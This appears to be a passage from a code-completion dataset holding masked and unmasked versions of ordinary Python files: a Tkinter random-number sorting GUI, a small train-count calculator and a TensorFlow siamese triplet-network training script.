Hasil Sorting \\n\", angka)\r\n print('RunTime : ', runtime)\r\n print('Jumlah data : ', len(angka))\r\n\r\n for hasil_entry in angka:\r\n hasil_listbox_widget.insert(tk.END, hasil_entry)\r\n\r\n bsi_time.config(text=\"% .12f\" % runtime)\r\n bsi_time.place(x=570, y=333)\r\n\r\n def generate(entry):\r\n\r\n listbox_widget.delete(0, tk.END)\r\n\r\n l = int(entry)\r\n listrandom = []\r\n for i in range(l):\r\n value = random.randint(1, 1000)\r\n listrandom.append(value)\r\n listbox_widget.insert(tk.END, value)\r\n\r\n angka = listrandom\r\n # print(listrandom)\r\n\r\n # listbox_entries = random.sample(range(100), int(entry))\r\n # for entry in listbox_entries:\r\n # listbox_widget.insert(tk.END, entry)\r\n #angka = listbox_widget.get(0, tk.END)\r\n\r\n def cls():\r\n hasil_listbox_widget.delete(0, tk.END)\r\n print(\"\\n\" * 100)\r\n # print [ listbox_widget.get(i) for i in listbox_widget.curselection()]\r\n\r\n ########################################################################\r\n menubar = Menu(root)\r\n\r\n filemenu = Menu(menubar, tearoff=0)\r\n filemenu.add_command(label=\"Generate Random Number\", command=donothing)\r\n filemenu.add_command(label=\"Close\", command=exit_editor)\r\n filemenu.add_separator()\r\n filemenu.add_command(label=\"Exit\", command=root.quit)\r\n\r\n menubar.add_cascade(label=\"File\", menu=filemenu)\r\n\r\n aboutmenu = Menu(menubar, tearoff=0)\r\n menubar.add_cascade(label=\"About\", menu=aboutmenu)\r\n aboutmenu.add_command(label=\"About\", command=about)\r\n aboutmenu.add_command(label=\"Help\", command=help_box)\r\n\r\n root.config(menu=menubar)\r\n\r\n ########################################################################\r\n\r\n # DATA SAMPLING ------------------------------\r\n frame_data = tk.Frame(root)\r\n frame_data.place(relx=0.128, rely=0.140, relwidth=0.18,\r\n relheight=0.65, anchor='n')\r\n\r\n listbox_widget = tk.Listbox(\r\n frame_data, selectmode=\"BROWSE\", height=20, width=20, background='white')\r\n listbox_widget_scrl = Scrollbar(frame_data, orient=VERTICAL)\r\n listbox_widget.config(yscrollcommand=listbox_widget_scrl.set)\r\n listbox_widget_scrl.configure(command=listbox_widget.yview)\r\n\r\n listbox_widget.grid(row=1, sticky=W)\r\n listbox_widget_scrl.grid(row=1, column=1, sticky=NS)\r\n\r\n # DATA HASIL ------------------------------\r\n frame_hasil = tk.Frame(root)\r\n frame_hasil.place(relx=0.34, rely=0.140, relwidth=0.18,\r\n relheight=0.65, anchor='n')\r\n\r\n hasil_listbox_widget = tk.Listbox(\r\n frame_hasil, selectmode=\"BROWSE\", height=20, width=20, background='white')\r\n hasil_listbox_widget_scrl = Scrollbar(frame_hasil, orient=VERTICAL)\r\n hasil_listbox_widget.config(yscrollcommand=hasil_listbox_widget_scrl.set)\r\n hasil_listbox_widget_scrl.configure(command=hasil_listbox_widget.yview)\r\n # hasil_listbox_entries = random.sample(range(100), 10)\r\n # for hasil_entry in hasil_listbox_entries:\r\n # hasil_listbox_widget.insert(tk.END, hasil_entry)\r\n hasil_listbox_widget.grid(row=1, sticky=W)\r\n hasil_listbox_widget_scrl.grid(row=1, column=1, sticky=NS)\r\n\r\n # Entry\r\n entry = tk.Entry(root, font=40, width=7)\r\n entry.place(x=105, y=450)\r\n\r\n # BUTTON\r\n bbs_button = tk.Button(root, text=\"START\", font=40,\r\n command=bbs_respon).place(x=434, y=140)\r\n iss_button = tk.Button(root, text=\"START\", font=40,\r\n command=iss_respon).place(x=555, y=140)\r\n sss_button = tk.Button(root, text=\"START\", font=40,\r\n command=sss_respon).place(x=680, y=140)\r\n bsi_button = tk.Button(root, text=\"START\", font=40,\r\n command=bsi_respon).place(x=466, y=330)\r\n # GENERATE DATA SAMPLING\r\n gen_button = tk.Button(root, text=\"GENERATE\", font=40,\r\n command=lambda: generate(entry.get()))\r\n gen_button.place(x=180, y=447)\r\n cls_button = tk.Button(root, text=\"CLEAN\", font=40,\r\n command=cls).place(x=295, y=447)\r\n\r\n # RESPON TIME\r\n bbs_time = ttk.Label(root, background=\"#6367c8\",\r\n foreground=\"#fff\")\r\n bbs_time['text'] = \"Respon Time\"\r\n bbs_time.place(x=429, y=185)\r\n\r\n iss_time = tk.Label(root,\r\n background=\"#6367c8\", foreground=\"#fff\")\r\n iss_time['text'] = \"Respon Time\"\r\n iss_time.place(x=555, y=185)\r\n\r\n sss_time = tk.Label(root,\r\n background=\"#6367c8\", foreground=\"#fff\")\r\n sss_time['text'] = \"Respon Time\"\r\n sss_time.place(x=680, y=185)\r\n\r\n bsi_time = tk.Label(root,\r\n background=\"#6367c8\", font=40, foreground=\"#fff\")\r\n bsi_time['text'] = \"Respon Time\"\r\n bsi_time.place(x=570, y=333)\r\n\r\n ########################################################################\r\n\r\n root.mainloop()\r\n\r\n\r\nmain()\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if m % 20 == 0:
m2 = m // 20
c = 20
else:
m2 = m // 20 + 1
c = m % 20
<|reserved_special_token_0|>
if f2 <= 0 or f2 - (20 - c) <= 0:
print('Number of trains needed: ' + str(m2))
else:
print('Number of trains needed: ' + str(1 + (f2 - (20 - c)) // 30 + m2))
<|reserved_special_token_1|>
m = int(input('Enter number of males:'))
f = int(input('Enter number of females:'))
if m % 20 == 0:
m2 = m // 20
c = 20
else:
m2 = m // 20 + 1
c = m % 20
f2 = f - 10 * m2
if f2 <= 0 or f2 - (20 - c) <= 0:
print('Number of trains needed: ' + str(m2))
else:
print('Number of trains needed: ' + str(1 + (f2 - (20 - c)) // 30 + m2))
<|reserved_special_token_1|>
# RUSH HOUR
m = int(input('Enter number of males:'))
f = int(input('Enter number of females:'))
if m%20 == 0:
m2 = m//20
c = 20
else:
m2 = m//20+1
c = m%20
f2 = f - 10*m2
if f2 <= 0 or f2-(20-c) <=0:
print('Number of trains needed: '+str(m2))
else:
print('Number of trains needed: '+str(1+(f2-(20-c))//30+m2))
|
flexible
|
{
"blob_id": "3c6ef57501e01da79f894b36726a93a3a5e0a8f6",
"index": 8068,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif m % 20 == 0:\n m2 = m // 20\n c = 20\nelse:\n m2 = m // 20 + 1\n c = m % 20\n<mask token>\nif f2 <= 0 or f2 - (20 - c) <= 0:\n print('Number of trains needed: ' + str(m2))\nelse:\n print('Number of trains needed: ' + str(1 + (f2 - (20 - c)) // 30 + m2))\n",
"step-3": "m = int(input('Enter number of males:'))\nf = int(input('Enter number of females:'))\nif m % 20 == 0:\n m2 = m // 20\n c = 20\nelse:\n m2 = m // 20 + 1\n c = m % 20\nf2 = f - 10 * m2\nif f2 <= 0 or f2 - (20 - c) <= 0:\n print('Number of trains needed: ' + str(m2))\nelse:\n print('Number of trains needed: ' + str(1 + (f2 - (20 - c)) // 30 + m2))\n",
"step-4": "# RUSH HOUR\r\nm = int(input('Enter number of males:'))\r\nf = int(input('Enter number of females:'))\r\n\r\n\r\nif m%20 == 0:\r\n m2 = m//20\r\n c = 20\r\nelse:\r\n m2 = m//20+1\r\n c = m%20\r\n\r\n\r\nf2 = f - 10*m2\r\n\r\nif f2 <= 0 or f2-(20-c) <=0:\r\n print('Number of trains needed: '+str(m2))\r\nelse:\r\n print('Number of trains needed: '+str(1+(f2-(20-c))//30+m2))\r\n\r\n\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if not os.path.exists(pb_path):
os.makedirs(pb_path)
if not os.path.exists(ckpt_path):
os.makedirs(ckpt_path)
<|reserved_special_token_0|>
if __name__ == '__main__':
first_shape = None
anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='anchor')
similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='similar')
dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='dissimilar')
labels_placeholder = tf.placeholder(tf.float32, shape=[None if
first_shape is None else first_shape * 3], name='labels')
is_training_placeholder = tf.placeholder_with_default(False, shape=(),
name='is_training')
siamese_net = siameseNet.siameseNet()
anchor = siamese_net.inference(anchor_placeholder, reuse=False,
is_training=is_training_placeholder)
similar = siamese_net.inference(similar_placeholder, reuse=True,
is_training=is_training_placeholder)
dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,
is_training=is_training_placeholder)
loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,
labels_placeholder, margin)
flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')
flatten_out_similar = tf.identity(similar, name='flatten_similar')
flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
global_step = tf.Variable(0, trainable=False)
with tf.control_dependencies([tf.group(*update_ops)]):
train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,
global_step=global_step)
var_list = tf.trainable_variables()
if global_step is not None:
var_list.append(global_step)
g_list = tf.global_variables()
bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]
bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]
var_list += bn_moving_vars
ckpt_saver = tf.train.Saver()
train_dataset = dataset.dataset(train_image_root, batch_size,
support_image_extensions, input_height, input_width, channals)
test_dataset = dataset.dataset(test_image_root, batch_size,
support_image_extensions, input_height, input_width, channals)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
total_iters_num = 0
for epoch_num in range(total_epoch_num):
train_images_num = train_dataset.sample_len
cur_epoch_iters_num = train_images_num // batch_size
for iters_num in range(cur_epoch_iters_num):
(train_anchor, train_similar, train_dissimilar, train_labels
) = train_dataset.next_triplet_batch()
test_anchor, test_similar, test_dissimilar, test_labels = (
test_dataset.next_triplet_batch())
if train_anchor is None or test_anchor is None:
continue
train_dict = {anchor_placeholder: train_anchor,
similar_placeholder: train_similar,
dissimilar_placeholder: train_dissimilar,
labels_placeholder: train_labels,
is_training_placeholder: True}
test_dict = {anchor_placeholder: test_anchor,
similar_placeholder: test_similar,
dissimilar_placeholder: test_dissimilar,
labels_placeholder: test_labels,
is_training_placeholder: False}
_, _global_step = sess.run([train_step, global_step],
feed_dict=train_dict)
anchor_out, similar_out, dissimilar_out = sess.run([
flatten_out_anchor, flatten_out_similar,
flatten_out_dissimilar], feed_dict=train_dict)
_train_loss, _train_pos_dist, _train_neg_dist = sess.run([
loss, pos_dist, neg_dist], feed_dict=train_dict)
_test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,
pos_dist, neg_dist], feed_dict=test_dict)
print('distance:', list(zip(_train_pos_dist.flatten(),
_train_neg_dist.flatten()))[:5])
one_moving_meaning_show = 'No mean or variance'
if len(bn_moving_vars) > 0:
one_moving_meaning = sess.graph.get_tensor_by_name(
bn_moving_vars[0].name)
one_moving_meaning_show = '{}={}'.format(bn_moving_vars
[0].name, np.mean(one_moving_meaning.eval()))
print(one_moving_meaning_show)
show_text = (
'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'
.format(epoch_num, iters_num + 1, _global_step,
_train_loss, '0.99', _test_loss))
print(show_text)
if _global_step % snapshot == 0:
constant_graph = graph_util.convert_variables_to_constants(
sess, sess.graph_def, ['flatten_anchor'])
save_model_name = model_name + '-' + str(_global_step
) + '.pb'
with tf.gfile.FastGFile(pb_path + save_model_name, mode
='wb') as fw:
fw.write(constant_graph.SerializeToString())
ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',
global_step=total_iters_num)
print('Successfully saved model {}'.format(save_model_name)
)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
batch_size = 64
input_height = 32
input_width = 32
total_epoch_num = 50
snapshot = 100
support_image_extensions = ['.jpg', '.png', '.jpeg', '.bmp']
margin = 1.0
channals = 3
train_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/train'
test_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/test'
model_path = 'models/'
pb_path = os.path.join(model_path, 'pb/')
ckpt_path = os.path.join(model_path, 'ckpt/')
if not os.path.exists(pb_path):
os.makedirs(pb_path)
if not os.path.exists(ckpt_path):
os.makedirs(ckpt_path)
model_name = 'siamese_triplet_28out_allloss_bn'
if __name__ == '__main__':
first_shape = None
anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='anchor')
similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='similar')
dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='dissimilar')
labels_placeholder = tf.placeholder(tf.float32, shape=[None if
first_shape is None else first_shape * 3], name='labels')
is_training_placeholder = tf.placeholder_with_default(False, shape=(),
name='is_training')
siamese_net = siameseNet.siameseNet()
anchor = siamese_net.inference(anchor_placeholder, reuse=False,
is_training=is_training_placeholder)
similar = siamese_net.inference(similar_placeholder, reuse=True,
is_training=is_training_placeholder)
dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,
is_training=is_training_placeholder)
loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,
labels_placeholder, margin)
flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')
flatten_out_similar = tf.identity(similar, name='flatten_similar')
flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
global_step = tf.Variable(0, trainable=False)
with tf.control_dependencies([tf.group(*update_ops)]):
train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,
global_step=global_step)
var_list = tf.trainable_variables()
if global_step is not None:
var_list.append(global_step)
g_list = tf.global_variables()
bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]
bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]
var_list += bn_moving_vars
ckpt_saver = tf.train.Saver()
train_dataset = dataset.dataset(train_image_root, batch_size,
support_image_extensions, input_height, input_width, channals)
test_dataset = dataset.dataset(test_image_root, batch_size,
support_image_extensions, input_height, input_width, channals)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
total_iters_num = 0
for epoch_num in range(total_epoch_num):
train_images_num = train_dataset.sample_len
cur_epoch_iters_num = train_images_num // batch_size
for iters_num in range(cur_epoch_iters_num):
(train_anchor, train_similar, train_dissimilar, train_labels
) = train_dataset.next_triplet_batch()
test_anchor, test_similar, test_dissimilar, test_labels = (
test_dataset.next_triplet_batch())
if train_anchor is None or test_anchor is None:
continue
train_dict = {anchor_placeholder: train_anchor,
similar_placeholder: train_similar,
dissimilar_placeholder: train_dissimilar,
labels_placeholder: train_labels,
is_training_placeholder: True}
test_dict = {anchor_placeholder: test_anchor,
similar_placeholder: test_similar,
dissimilar_placeholder: test_dissimilar,
labels_placeholder: test_labels,
is_training_placeholder: False}
_, _global_step = sess.run([train_step, global_step],
feed_dict=train_dict)
anchor_out, similar_out, dissimilar_out = sess.run([
flatten_out_anchor, flatten_out_similar,
flatten_out_dissimilar], feed_dict=train_dict)
_train_loss, _train_pos_dist, _train_neg_dist = sess.run([
loss, pos_dist, neg_dist], feed_dict=train_dict)
_test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,
pos_dist, neg_dist], feed_dict=test_dict)
print('distance:', list(zip(_train_pos_dist.flatten(),
_train_neg_dist.flatten()))[:5])
one_moving_meaning_show = 'No mean or variance'
if len(bn_moving_vars) > 0:
one_moving_meaning = sess.graph.get_tensor_by_name(
bn_moving_vars[0].name)
one_moving_meaning_show = '{}={}'.format(bn_moving_vars
[0].name, np.mean(one_moving_meaning.eval()))
print(one_moving_meaning_show)
show_text = (
'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'
.format(epoch_num, iters_num + 1, _global_step,
_train_loss, '0.99', _test_loss))
print(show_text)
if _global_step % snapshot == 0:
constant_graph = graph_util.convert_variables_to_constants(
sess, sess.graph_def, ['flatten_anchor'])
save_model_name = model_name + '-' + str(_global_step
) + '.pb'
with tf.gfile.FastGFile(pb_path + save_model_name, mode
='wb') as fw:
fw.write(constant_graph.SerializeToString())
ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',
global_step=total_iters_num)
print('Successfully saved model {}'.format(save_model_name)
)
<|reserved_special_token_1|>
import tensorflow as tf
from tensorflow.python.framework import graph_util
from net import siameseNet_batchnorm as siameseNet
import dataset
import numpy as np
import cv2
import os
batch_size = 64
input_height = 32
input_width = 32
total_epoch_num = 50
snapshot = 100
support_image_extensions = ['.jpg', '.png', '.jpeg', '.bmp']
margin = 1.0
channals = 3
train_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/train'
test_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/test'
model_path = 'models/'
pb_path = os.path.join(model_path, 'pb/')
ckpt_path = os.path.join(model_path, 'ckpt/')
if not os.path.exists(pb_path):
os.makedirs(pb_path)
if not os.path.exists(ckpt_path):
os.makedirs(ckpt_path)
model_name = 'siamese_triplet_28out_allloss_bn'
if __name__ == '__main__':
first_shape = None
anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='anchor')
similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='similar')
dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='dissimilar')
labels_placeholder = tf.placeholder(tf.float32, shape=[None if
first_shape is None else first_shape * 3], name='labels')
is_training_placeholder = tf.placeholder_with_default(False, shape=(),
name='is_training')
siamese_net = siameseNet.siameseNet()
anchor = siamese_net.inference(anchor_placeholder, reuse=False,
is_training=is_training_placeholder)
similar = siamese_net.inference(similar_placeholder, reuse=True,
is_training=is_training_placeholder)
dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,
is_training=is_training_placeholder)
loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,
labels_placeholder, margin)
flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')
flatten_out_similar = tf.identity(similar, name='flatten_similar')
flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
global_step = tf.Variable(0, trainable=False)
with tf.control_dependencies([tf.group(*update_ops)]):
train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,
global_step=global_step)
var_list = tf.trainable_variables()
if global_step is not None:
var_list.append(global_step)
g_list = tf.global_variables()
bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]
bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]
var_list += bn_moving_vars
ckpt_saver = tf.train.Saver()
train_dataset = dataset.dataset(train_image_root, batch_size,
support_image_extensions, input_height, input_width, channals)
test_dataset = dataset.dataset(test_image_root, batch_size,
support_image_extensions, input_height, input_width, channals)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
total_iters_num = 0
for epoch_num in range(total_epoch_num):
train_images_num = train_dataset.sample_len
cur_epoch_iters_num = train_images_num // batch_size
for iters_num in range(cur_epoch_iters_num):
(train_anchor, train_similar, train_dissimilar, train_labels
) = train_dataset.next_triplet_batch()
test_anchor, test_similar, test_dissimilar, test_labels = (
test_dataset.next_triplet_batch())
if train_anchor is None or test_anchor is None:
continue
train_dict = {anchor_placeholder: train_anchor,
similar_placeholder: train_similar,
dissimilar_placeholder: train_dissimilar,
labels_placeholder: train_labels,
is_training_placeholder: True}
test_dict = {anchor_placeholder: test_anchor,
similar_placeholder: test_similar,
dissimilar_placeholder: test_dissimilar,
labels_placeholder: test_labels,
is_training_placeholder: False}
_, _global_step = sess.run([train_step, global_step],
feed_dict=train_dict)
anchor_out, similar_out, dissimilar_out = sess.run([
flatten_out_anchor, flatten_out_similar,
flatten_out_dissimilar], feed_dict=train_dict)
_train_loss, _train_pos_dist, _train_neg_dist = sess.run([
loss, pos_dist, neg_dist], feed_dict=train_dict)
_test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,
pos_dist, neg_dist], feed_dict=test_dict)
print('distance:', list(zip(_train_pos_dist.flatten(),
_train_neg_dist.flatten()))[:5])
one_moving_meaning_show = 'No mean or variance'
if len(bn_moving_vars) > 0:
one_moving_meaning = sess.graph.get_tensor_by_name(
bn_moving_vars[0].name)
one_moving_meaning_show = '{}={}'.format(bn_moving_vars
[0].name, np.mean(one_moving_meaning.eval()))
print(one_moving_meaning_show)
show_text = (
'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'
.format(epoch_num, iters_num + 1, _global_step,
_train_loss, '0.99', _test_loss))
print(show_text)
if _global_step % snapshot == 0:
constant_graph = graph_util.convert_variables_to_constants(
sess, sess.graph_def, ['flatten_anchor'])
save_model_name = model_name + '-' + str(_global_step
) + '.pb'
with tf.gfile.FastGFile(pb_path + save_model_name, mode
='wb') as fw:
fw.write(constant_graph.SerializeToString())
ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',
global_step=total_iters_num)
print('Successfully saved model {}'.format(save_model_name)
)
<|reserved_special_token_1|>
import tensorflow as tf
from tensorflow.python.framework import graph_util
from net import siameseNet_batchnorm as siameseNet
import dataset
import numpy as np
import cv2
import os
batch_size=64
input_height=32
input_width=32
total_epoch_num=50
snapshot=100
support_image_extensions=[".jpg",".png",".jpeg",".bmp"]
margin=1.0
channals=3
train_image_root="D:/forTensorflow/charRecTrain/forMyDNNCode/train"
test_image_root="D:/forTensorflow/charRecTrain/forMyDNNCode/test"
model_path="models/"
pb_path=os.path.join(model_path,"pb/")
ckpt_path=os.path.join(model_path,"ckpt/")
if not os.path.exists(pb_path):
os.makedirs(pb_path)
if not os.path.exists(ckpt_path):
os.makedirs(ckpt_path)
model_name="siamese_triplet_28out_allloss_bn"
if __name__ == '__main__':
# image_paths,labels=get_images_path(test_image_root)
# data=next_batch(True,None,image_paths,labels)
# for left,right,label in zip(*data):
# cv2.imshow("left",left)
# cv2.imshow("right", right)
# print(label)
# cv2.waitKey(0)
first_shape=None
anchor_placeholder = tf.placeholder(tf.float32,shape=[first_shape,input_height,input_width,channals],name="anchor")
similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape, input_height, input_width, channals], name="similar")
dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape, input_height, input_width, channals], name="dissimilar")
labels_placeholder = tf.placeholder(tf.float32, shape=
[None if first_shape is None else first_shape * 3, ], name="labels")
is_training_placeholder = tf.placeholder_with_default(False, shape=(), name="is_training")
siamese_net=siameseNet.siameseNet()
anchor = siamese_net.inference(anchor_placeholder,reuse=False,is_training=is_training_placeholder)
similar = siamese_net.inference(similar_placeholder,reuse=True,is_training=is_training_placeholder)
dissimilar = siamese_net.inference(dissimilar_placeholder,reuse=True,is_training=is_training_placeholder)
loss,pos_dist,neg_dist = siamese_net.loss(anchor,similar,dissimilar,labels_placeholder,margin)
flatten_out_anchor = tf.identity(anchor, name="flatten_anchor")
flatten_out_similar = tf.identity(similar, name="flatten_similar")
flatten_out_dissimilar = tf.identity(dissimilar, name="flatten_dissimilar")
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
global_step = tf.Variable(0, trainable=False)
# learning_rate = tf.train.exponential_decay(0.01, global_step, 100, 0.9)
# optimizer = tf.train.MomentumOptimizer(learning_rate, 0.9)
with tf.control_dependencies([tf.group(*update_ops)]):
# train_step = optimizer.minimize(loss, global_step)
train_step = tf.train.MomentumOptimizer(0.01, 0.90).\
minimize(loss, global_step=global_step)
var_list = tf.trainable_variables()
if global_step is not None:
var_list.append(global_step)
g_list = tf.global_variables() # 从全局变量中获得batch norm的缩放和偏差
bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]
bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]
var_list += bn_moving_vars
ckpt_saver = tf.train.Saver()
train_dataset = dataset.dataset(train_image_root,batch_size,support_image_extensions,
input_height,input_width,channals)
test_dataset = dataset.dataset(test_image_root, batch_size, support_image_extensions,
input_height, input_width, channals)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
# if os.path.exists(os.path.join(ckpt_path, "checkpoint")):
# ckpt_saver.restore(sess, tf.train.latest_checkpoint(ckpt_path))
total_iters_num = 0
for epoch_num in range(total_epoch_num):
train_images_num = train_dataset.sample_len
cur_epoch_iters_num = train_images_num // batch_size
for iters_num in range(cur_epoch_iters_num):
train_anchor, train_similar, train_dissimilar,train_labels = \
train_dataset.next_triplet_batch()
test_anchor, test_similar, test_dissimilar,test_labels = \
test_dataset.next_triplet_batch()
if train_anchor is None or test_anchor is None:
continue
train_dict = {anchor_placeholder: train_anchor,
similar_placeholder: train_similar,
dissimilar_placeholder: train_dissimilar,
labels_placeholder:train_labels,
is_training_placeholder:True}
test_dict = {anchor_placeholder: test_anchor,
similar_placeholder: test_similar,
dissimilar_placeholder: test_dissimilar,
labels_placeholder:test_labels,
is_training_placeholder: False}
_,_global_step=sess.run([train_step,global_step], feed_dict=train_dict)
anchor_out,similar_out,dissimilar_out = sess.run([
flatten_out_anchor,flatten_out_similar,flatten_out_dissimilar],
feed_dict=train_dict)
_train_loss,_train_pos_dist,_train_neg_dist = \
sess.run([loss,pos_dist,neg_dist], feed_dict=train_dict)
_test_loss,_test_pos_dist,_test_neg_dist =\
sess.run([loss,pos_dist,neg_dist], feed_dict=test_dict)
print("distance:",list(zip(_train_pos_dist.flatten(),_train_neg_dist.flatten()))[:5])
one_moving_meaning_show = "No mean or variance"
if len(bn_moving_vars) > 0:
one_moving_meaning = sess.graph.get_tensor_by_name(bn_moving_vars[0].name)
one_moving_meaning_show = "{}={}".\
format(bn_moving_vars[0].name,np.mean(one_moving_meaning.eval()))
print(one_moving_meaning_show)
show_text = "epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}".format \
(epoch_num, iters_num + 1, _global_step, _train_loss, "0.99", _test_loss)
print(show_text)
if _global_step % snapshot == 0:
# 保存PB
constant_graph = graph_util.convert_variables_to_constants(sess, sess.graph_def, ["flatten_anchor"])
save_model_name=model_name + "-" + str(_global_step) + ".pb"
with tf.gfile.FastGFile(pb_path + save_model_name, mode="wb") as fw:
fw.write(constant_graph.SerializeToString())
# 保存CKPT
ckpt_saver.save(sess, ckpt_path + model_name + ".ckpt", global_step=total_iters_num)
print("Successfully saved model {}".format(save_model_name))
|
flexible
|
{
"blob_id": "97bbb181cbc0f5bfbf0b2298133fc226b6217d91",
"index": 399,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif not os.path.exists(pb_path):\n os.makedirs(pb_path)\nif not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\n<mask token>\nif __name__ == '__main__':\n first_shape = None\n anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='anchor')\n similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='similar')\n dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='dissimilar')\n labels_placeholder = tf.placeholder(tf.float32, shape=[None if \n first_shape is None else first_shape * 3], name='labels')\n is_training_placeholder = tf.placeholder_with_default(False, shape=(),\n name='is_training')\n siamese_net = siameseNet.siameseNet()\n anchor = siamese_net.inference(anchor_placeholder, reuse=False,\n is_training=is_training_placeholder)\n similar = siamese_net.inference(similar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,\n labels_placeholder, margin)\n flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')\n flatten_out_similar = tf.identity(similar, name='flatten_similar')\n flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n global_step = tf.Variable(0, trainable=False)\n with tf.control_dependencies([tf.group(*update_ops)]):\n train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,\n global_step=global_step)\n var_list = tf.trainable_variables()\n if global_step is not None:\n var_list.append(global_step)\n g_list = tf.global_variables()\n bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]\n bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]\n var_list += bn_moving_vars\n ckpt_saver = tf.train.Saver()\n train_dataset = dataset.dataset(train_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n test_dataset = dataset.dataset(test_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n total_iters_num = 0\n for epoch_num in range(total_epoch_num):\n train_images_num = train_dataset.sample_len\n cur_epoch_iters_num = train_images_num // batch_size\n for iters_num in range(cur_epoch_iters_num):\n (train_anchor, train_similar, train_dissimilar, train_labels\n ) = train_dataset.next_triplet_batch()\n test_anchor, test_similar, test_dissimilar, test_labels = (\n test_dataset.next_triplet_batch())\n if train_anchor is None or test_anchor is None:\n continue\n train_dict = {anchor_placeholder: train_anchor,\n similar_placeholder: train_similar,\n dissimilar_placeholder: train_dissimilar,\n labels_placeholder: train_labels,\n is_training_placeholder: True}\n test_dict = {anchor_placeholder: test_anchor,\n similar_placeholder: test_similar,\n dissimilar_placeholder: test_dissimilar,\n labels_placeholder: test_labels,\n is_training_placeholder: False}\n _, _global_step = sess.run([train_step, global_step],\n feed_dict=train_dict)\n anchor_out, similar_out, dissimilar_out = sess.run([\n flatten_out_anchor, flatten_out_similar,\n flatten_out_dissimilar], feed_dict=train_dict)\n _train_loss, _train_pos_dist, _train_neg_dist = sess.run([\n loss, pos_dist, 